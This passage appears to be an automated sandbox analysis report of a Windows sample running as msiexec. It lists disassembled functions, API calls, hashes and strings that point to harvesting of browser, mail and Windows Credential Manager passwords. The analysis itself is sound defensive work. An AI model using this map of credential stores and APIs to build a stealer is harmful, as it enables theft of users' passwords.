                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                        • API String ID: 3402215030-3842416460
                                                                                        • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                        • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                        • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                        • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                        Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                          • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                          • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                          • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                          • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                          • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                          • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                          • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                        • strlen.MSVCRT ref: 0040F139
                                                                                        • strlen.MSVCRT ref: 0040F147
                                                                                        • memset.MSVCRT ref: 0040F187
                                                                                        • strlen.MSVCRT ref: 0040F196
                                                                                        • strlen.MSVCRT ref: 0040F1A4
                                                                                        • memset.MSVCRT ref: 0040F1EA
                                                                                        • strlen.MSVCRT ref: 0040F1F9
                                                                                        • strlen.MSVCRT ref: 0040F207
                                                                                        • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                        • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                        • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                        • API String ID: 2003275452-3138536805
                                                                                        • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                        • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                        • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                        • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                        Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C3F7
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                        • strrchr.MSVCRT ref: 0040C417
                                                                                        • _mbscat.MSVCRT ref: 0040C431
                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                        • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                        • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                        • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                        • API String ID: 1012775001-1343505058
                                                                                        • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                        • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                        • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                        • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                        Function 004445ED Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00444612
                                                                                          • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                        • strlen.MSVCRT ref: 0044462E
                                                                                        • memset.MSVCRT ref: 00444668
                                                                                        • memset.MSVCRT ref: 0044467C
                                                                                        • memset.MSVCRT ref: 00444690
                                                                                        • memset.MSVCRT ref: 004446B6
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                          • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                        • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                          • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                          • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                        • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                        • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpymemset$strlen$_mbscpy
                                                                                        • String ID: salu
                                                                                        • API String ID: 3691931180-4177317985
                                                                                        • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                        • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                        • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                        • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                        Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                        • API String ID: 2449869053-232097475
                                                                                        • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                        • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                        • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                        • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                        Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sprintf.MSVCRT ref: 0040957B
                                                                                        • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                          • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                          • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                          • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                          • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                        • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                        • sprintf.MSVCRT ref: 004095EB
                                                                                        • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                        • memset.MSVCRT ref: 0040961C
                                                                                        • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                        • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                        • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                        • String ID: caption$dialog_%d$menu_%d
                                                                                        • API String ID: 3259144588-3822380221
                                                                                        • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                        • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                        • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                        • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                        Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                        • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                        • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                        • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                        • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                        • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                        • API String ID: 2449869053-4258758744
                                                                                        • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                        • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                        • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                        • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                        Function 00443AAB Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 136stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                          • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                          • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                        • strlen.MSVCRT ref: 00443AD2
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 00443AE2
                                                                                        • memset.MSVCRT ref: 00443B2E
                                                                                        • memset.MSVCRT ref: 00443B4B
                                                                                        • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                        • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                          • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                        Strings
                                                                                        • Salt, xrefs: 00443BA7
                                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                        • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscpymemset$??2@??3@AddressByteCharFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                        • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                        • API String ID: 4030136668-2687544566
                                                                                        • Opcode ID: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                                        • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                        • Opcode Fuzzy Hash: 8d63d9ccfc49efb257c43273cbef49ec7928a411306aa0b1e98862e3d40e68ab
                                                                                        • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                        Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcsstr.MSVCRT ref: 0040426A
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                        • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                        • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                        • strchr.MSVCRT ref: 004042F6
                                                                                        • strlen.MSVCRT ref: 0040430A
                                                                                        • sprintf.MSVCRT ref: 0040432B
                                                                                        • strchr.MSVCRT ref: 0040433C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                        • String ID: %s@gmail.com$www.google.com
                                                                                        • API String ID: 3866421160-4070641962
                                                                                        • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                        • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                        • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                        • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                        Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                        • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                          • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                          • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                          • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                        • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                        • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                        • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                        • memset.MSVCRT ref: 004097BD
                                                                                        • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                          • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                        • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                        • API String ID: 1035899707-3647959541
                                                                                        • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                        • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                        • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                        • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                        Function 0040CA30 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                        • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                        • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                        • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                        • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                          • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                          • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                          • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                        • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                        • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                        • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                        • SetFocus.USER32(?), ref: 0040CB92
                                                                                        • SetFocus.USER32(?), ref: 0040CC0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                        • String ID:
                                                                                        • API String ID: 1416211542-0
                                                                                        • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                        • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                        • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                        • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                        Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                        • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                        • API String ID: 2360744853-2229823034
                                                                                        • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                        • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                        • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                        • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                        Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strchr.MSVCRT ref: 004100E4
                                                                                        • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                          • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                          • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                        • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                        • _mbscat.MSVCRT ref: 0041014D
                                                                                        • memset.MSVCRT ref: 00410129
                                                                                          • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                          • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                        • memset.MSVCRT ref: 00410171
                                                                                        • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                        • _mbscat.MSVCRT ref: 00410197
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                        • String ID: \systemroot
                                                                                        • API String ID: 912701516-1821301763
                                                                                        • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                        • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                        • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                        • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                        Function 004108E5 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                        • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                        • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                        • memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                        Strings
                                                                                        • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                        • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                        • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                        • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                        • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                        • API String ID: 1640410171-2022683286
                                                                                        • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                        • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                        • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                        • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                        Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00412F93: strlen.MSVCRT ref: 00412FA1
                                                                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041983C
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041985B
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,004067AF,?,0041D945,00000000), ref: 0041986D
                                                                                        • memcpy.MSVCRT(?,-journal,0000000A,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 00419885
                                                                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,004067AF,?,0041D945,00000000), ref: 004198A2
